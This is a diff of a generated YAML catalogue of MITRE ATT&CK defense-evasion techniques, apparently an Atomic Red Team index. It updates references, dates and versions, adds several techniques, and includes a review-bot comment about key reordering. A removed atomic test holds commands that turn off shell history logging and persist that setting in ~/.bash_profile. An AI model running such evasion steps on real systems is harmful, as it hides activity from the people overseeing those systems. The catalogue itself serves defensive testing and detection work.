@@ -24142,9 +27795,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.002
url: https://attack.mitre.org/techniques/T1574/002
- - external_id: CAPEC-capec
+ - external_id: CAPEC-641
source_name: capec
- url: https://capec.mitre.org/data/definitions/capec.html
+ url: https://capec.mitre.org/data/definitions/641.html
- source_name: About Side by Side Assemblies
url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies-
description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved
@@ -24172,7 +27825,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:05:42.513Z'
+ modified: '2020-10-17T15:15:27.807Z'
created: '2020-03-13T19:41:37.908Z'
x_mitre_defense_bypassed:
- Anti-virus
@@ -24231,6 +27884,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -24257,9 +27913,9 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -24316,8 +27972,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1578/003
- source_name: Mandiant M-Trends 2020
url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
- April 24, 2020.
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
- source_name: AWS CloudTrail Search
url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
@@ -24342,7 +27998,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-17T19:53:14.784Z'
+ modified: '2020-09-14T19:55:23.113Z'
created: '2020-06-16T17:23:06.508Z'
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
@@ -24541,6 +28197,115 @@ defense-evasion:
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
+ T1562.008:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.008
+ url: https://attack.mitre.org/techniques/T1562/008
+ - source_name: 'Following the CloudTrail: Generating strong AWS security signals
+ with Sumo Logic'
+ url: https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
+ description: 'Dan Whalen. (2019, September 10). Following the CloudTrail:
+ Generating strong AWS security signals with Sumo Logic. Retrieved October
+ 16, 2020.'
+ - source_name: Stopping CloudTrail from Sending Events to CloudWatch Logs
+ url: https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
+ description: Amazon Web Services. (n.d.). Stopping CloudTrail from Sending
+ Events to CloudWatch Logs. Retrieved October 16, 2020.
+ - source_name: Configuring Data Access audit logs
+ url: https://cloud.google.com/logging/docs/audit/configure-data-access
+ description: Google. (n.d.). Configuring Data Access audit logs. Retrieved
+ October 16, 2020.
+ - source_name: az monitor diagnostic-settings
+ url: https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete
+ description: Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved
+ October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Disable Cloud Logs
+ description: "An adversary may disable cloud logging capabilities and integrations
+ to limit what data is collected on their activities and avoid detection. \n\nCloud
+ environments allow for collection and analysis of audit and application logs
+ that provide insight into what activities a user does within the environment.
+ If an attacker has sufficient permissions, they can disable logging to avoid
+ detection of their activities. For example, in AWS an adversary may disable
+ CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation:
+ Following the CloudTrail: Generating strong AWS security signals with Sumo
+ Logic)"
+ id: attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-19T16:31:34.489Z'
+ created: '2020-10-12T13:52:32.846Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
+ for: StopLogging and DeleteTrail.(Citation: Stopping
+ CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation:
+ Configuring Data Access audit logs) In Azure, monitor for az monitor
+ diagnostic-settings delete.(Citation: az monitor diagnostic-settings)
+ Additionally, a sudden loss of a log source may indicate that it has been
+ disabled.'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Azure activity logs
+ - GCP audit logs
+ x_mitre_contributors:
+ - Ibrahim Ali Khan
+ - AttackIQ
+ - Janantha Marasinghe
+ - 'Sekhar Sarukkai; Prasad Somasamudram; Syed Ummar Farooqh (McAfee) '
+ - Matt Snyder, VMware
+ x_mitre_platforms:
+ - GCP
+ - Azure
+ - AWS
+ atomic_tests: []
+ T1600.002:
+ technique:
+ id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
+ description: |-
+ Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
+
+ Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)
+ name: Disable Crypto Hardware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600.002
+ url: https://attack.mitre.org/techniques/T1600/002
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:37:48.503Z'
+ created: '2020-10-19T19:11:18.757Z'
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that disable cryptographic hardware. Detection efforts may be focused
+ on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some
+ detection methods require vendor support to aid in investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1562.002:
technique:
external_references:
@@ -24632,8 +28397,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1562/007
- source_name: Expel IO Evil in AWS
url: https://expel.io/blog/finding-evil-in-aws/
- description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
- 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -24655,7 +28420,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-07T13:49:05.345Z'
+ modified: '2020-09-14T20:02:24.426Z'
created: '2020-06-24T16:55:46.243Z'
x_mitre_contributors:
- Expel
@@ -25398,31 +29163,13 @@ defense-evasion:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
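Review bot: In the T1078.002 `technique` mapping the `created`, `modified`, `kill_chain_phases`, `type`, `id`, `description`, `name`, `created_by_ref` and `object_marking_refs` keys are removed here and re-added with identical content in the next hunk, so the only semantic changes — the new `CAPEC-560` reference in this hunk and the `modified`/`x_mitre_version: '1.1'` bump in the following one — are buried in roughly sixty lines of churn. The same key reshuffle recurs for T1055.001 (three hunks, starting at the `@@ -25573,7 +29394,31 @@` hunk) and for T1222 (the two hunks at `@@ -26353,12 +30174,6 @@` and `@@ -26384,6 +30199,12 @@`). This file looks generated from the upstream ATT&CK data, so the ordering presumably follows whatever key order the source objects happen to have; if that is the case, have the generator emit each `technique` mapping in a fixed key order (or sort keys before dumping) so that diffs of ATT&CK refreshes show only the fields that actually changed and a reviewer can check each new `external_references` entry and version bump without reconstructing moved blocks. As it stands, a silent content change inside one of the moved blocks would be very easy to miss in this review.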
@@ -25435,22 +29182,43 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1556.001:
technique:
@@ -25470,11 +29238,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Controller Authentication
- description: "Adversaries may patch the authentication process on a domain control
+ description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
- process on a domain control with the intent of creating a backdoor used to
- access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
+ process on a domain controller with the intent of creating a backdoor used
+ to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
Skeleton key works through a patch on an enterprise domain controller authentication
process (LSASS) with credentials that adversaries may use to bypass the standard
authentication system. Once patched, an adversary can use the injected password
@@ -25489,7 +29257,7 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:51:30.829Z'
+ modified: '2020-08-26T14:16:48.125Z'
created: '2020-02-11T19:05:02.399Z'
x_mitre_data_sources:
- Authentication logs
@@ -25516,6 +29284,59 @@ defense-evasion:
x_mitre_platforms:
- Windows
atomic_tests: []
+ T1601.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601.002
+ url: https://attack.mitre.org/techniques/T1601/002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Downgrade System Image
+ description: "Adversaries may install an older version of the operating system
+ of a network device to weaken security. Older operating system versions on
+ network devices often have weaker encryption ciphers and, in general, fewer/less
+ updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn
+ embedded devices, downgrading the version typically only requires replacing
+ the operating system file in storage. With most embedded devices, this can
+ be achieved by downloading a copy of the desired version of the operating
+ system file and reconfiguring the device to boot from that file on next system
+ restart. The adversary could then restart the device to implement the change
+ immediately or they could wait until the next time the system restarts.\n\nDowngrading
+ the system image to an older versions may allow an adversary to evade defenses
+ by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).
+ \ Downgrading of a system image can be done on its own, or it can be used
+ in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).
+ \ "
+ id: attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:49:02.660Z'
+ created: '2020-10-19T19:53:10.576Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Many embedded network devices provide a command to print
+ the version of the currently running operating system. Use this command to
+ query the operating system for its version number and compare it to what is
+ expected for the device in question. Because image downgrade may be used
+ in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001),
+ it may be appropriate to also verify the integrity of the vendor provided
+ operating system image file. '
+ x_mitre_data_sources:
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1574.004:
technique:
id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490
@@ -25533,9 +29354,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -25552,7 +29373,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -25573,7 +29394,31 @@ defense-evasion:
atomic_tests: []
T1055.001:
technique:
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ created: '2020-01-14T01:26:08.145Z'
+ modified: '2020-06-20T22:17:59.148Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.001
+ url: https://attack.mitre.org/techniques/T1055/001
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.endgame.com/blog/technical-blog/hunting-memory
+ description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
+ 7, 2017.
+ source_name: Endgame HuntingNMemory June 2017
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic-link Library Injection
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
@@ -25593,35 +29438,17 @@ defense-evasion:
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via DLL injection may also evade detection from security products
since the execution is masked under a legitimate process. "
- name: Dynamic-link Library Injection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.001
- url: https://attack.mitre.org/techniques/T1055/001
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.endgame.com/blog/technical-blog/hunting-memory
- description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
- 7, 2017.
- source_name: Endgame HuntingNMemory June 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-06-20T22:17:59.148Z'
- created: '2020-01-14T01:26:08.145Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -25636,16 +29463,10 @@ defense-evasion:
if a process is performing actions it usually does not, such as opening network
connections, reading files, or other suspicious actions that could relate
to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
- - File monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Application control
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1548.004:
technique:
@@ -25825,7 +29646,7 @@ defense-evasion:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -26353,12 +30174,6 @@ defense-evasion:
name: powershell
T1222:
technique:
- created: '2018-10-17T00:14:20.652Z'
- modified: '2020-03-29T23:12:40.212Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: File and Directory Permissions Modification
@@ -26384,6 +30199,12 @@ defense-evasion:
source_name: EventTracker File Permissions Feb 2014
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-01T20:05:05.562Z'
+ created: '2018-10-17T00:14:20.652Z'
x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
@@ -26611,88 +30432,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
atomic_tests: []
- T1562.003:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1562.003
- url: https://attack.mitre.org/techniques/T1562/003
- - external_id: CAPEC-13
- source_name: capec
- url: https://capec.mitre.org/data/definitions/13.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: HISTCONTROL
- description: |-
- Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
-
- This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history.
-
- Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
- id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T22:09:18.020Z'
- created: '2020-02-21T20:56:06.498Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_detection: Correlating a user session with a distinct lack of new commands
- in their .bash_history can be a clue to suspicious behavior.
- Additionally, users checking or changing their HISTCONTROL environment
- variable is also suspicious.
- x_mitre_data_sources:
- - Environment variable
- - File monitoring
- - Authentication logs
- - Process monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- identifier: T1562.003
- atomic_tests:
- - name: Disable history collection
- auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
- description: 'Disables history collection in shells
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- evil_command:
- description: Command to run after shell history collection is disabled
- type: String
- default: whoami
- executor:
- command: |
- export HISTCONTROL=ignoreboth
- #{evil_command}
- name: sh
- - name: Mac HISTCONTROL
- auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
- description: "The HISTCONTROL variable is set to ignore (not write to the history
- file) command that are a duplicate of something already in the history \nand
- commands that start with a space. This atomic sets this variable in the current
- session and also writes it to the current user's ~/.bash_profile \nso that
- it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n"
- supported_platforms:
- - macos
- - linux
- executor:
- steps: |
- 1. export HISTCONTROL=ignoreboth
- 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
- 3. ls
- 4. whoami > recon.txt
- name: manual
T1564.005:
technique:
external_references:
@@ -26754,25 +30493,6 @@ defense-evasion:
atomic_tests: []
T1564.001:
technique:
- created: '2020-02-26T17:46:13.128Z'
- modified: '2020-03-29T22:32:25.985Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
- id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
- description: |-
- Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
-
- On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
-
- Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
-
- Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
- name: Hidden Files and Directories
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564.001
@@ -26789,23 +30509,42 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor the file system and shell commands for files being
- created with a leading "." and the Windows command-line use of attrib.exe
- to add the hidden attribute.
- x_mitre_permissions_required:
- - User
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hidden Files and Directories
+ description: |-
+ Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
+
